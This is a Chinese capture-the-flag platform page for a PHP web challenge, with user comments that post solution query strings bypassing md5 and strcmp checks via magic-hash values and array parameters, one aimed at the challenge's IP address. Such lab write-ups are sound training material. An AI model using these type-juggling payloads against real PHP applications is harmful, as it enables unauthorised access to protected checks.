前女友WEB 未解决

分数: 30 金币: 3
题目作者: 未知
一  血: chounana
一血奖励: 2金币
解  决: 6888
提  示:
描  述:
来源 山科大ctf
评论
暮光闪闪 8月前

会起标题的

回复 0

Bruce20231767 8月前

http://117.72.52.127:19244/?v1=QNKCDZO&v2=240610708&v3[]=3 v1与v2值不相等但是MD5值相等,当然也可以使用数组因为MD5漏洞是无法识别数组 v3使用数组是因为,strcmp函数理应产生警告但是由于php版本问题被忽略,结果返回的是false(这里等价与$v3与$flag值相等),然后 !false ,成功绕过

回复 0

shuiwang 8月前

你为什么要我解这个

回复 1

lwgzs 9月前

查看源码,弱类型比较

回复 0

ctfer-pls 9月前

md5值绕过

回复 0

2686213396 9月前

hash碰撞+strcmp绕过

回复 0

iNMB 9月前

?v1=TEXTCOLLBYfGiJUETHQ4hAcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak&v2=TEXTCOLLBYfGiJUETHQ4hEcKSMd5zYpgqf1YRDhkmxHkhPWptrkoyz28wnI9V0aHeAuaKnak&v3[]=test

回复 1

ahco 9月前

v1[]=123&v2[]=234&v3=flag{*******}

回复 0

zhuizhui 9月前

md5绕过和strcmp漏洞 strcmp漏洞:一个数组一个字符串也返回0

回复 0

xlogsrc 10月前

?v1[]=a&v2[]=b&v3[]=c

回复 0

WriteUp

image
harry

3 金币

评分(14)

解题动态

ctf_winner 攻破了该题 12小时前
kgdw1313113 攻破了该题 12小时前
Aholic· 攻破了该题 16小时前
testctffff 攻破了该题 20小时前
甜小甜 攻破了该题 1天前
hellonight 攻破了该题 1天前
1302074808 攻破了该题 1天前
Shaye 攻破了该题 1天前
orr_ 攻破了该题 1天前
wz666 攻破了该题 1天前
13002045137 攻破了该题 1天前
cc131 攻破了该题 2天前
白色狸花猫 攻破了该题 2天前
我是新手* 攻破了该题 2天前
落梅雨 攻破了该题 2天前
喜羊羊1 攻破了该题 2天前
呵呵 攻破了该题 2天前
ajdnckwkjf 攻破了该题 2天前
Tychema 攻破了该题 2天前
拾叁 攻破了该题 2天前
问题反馈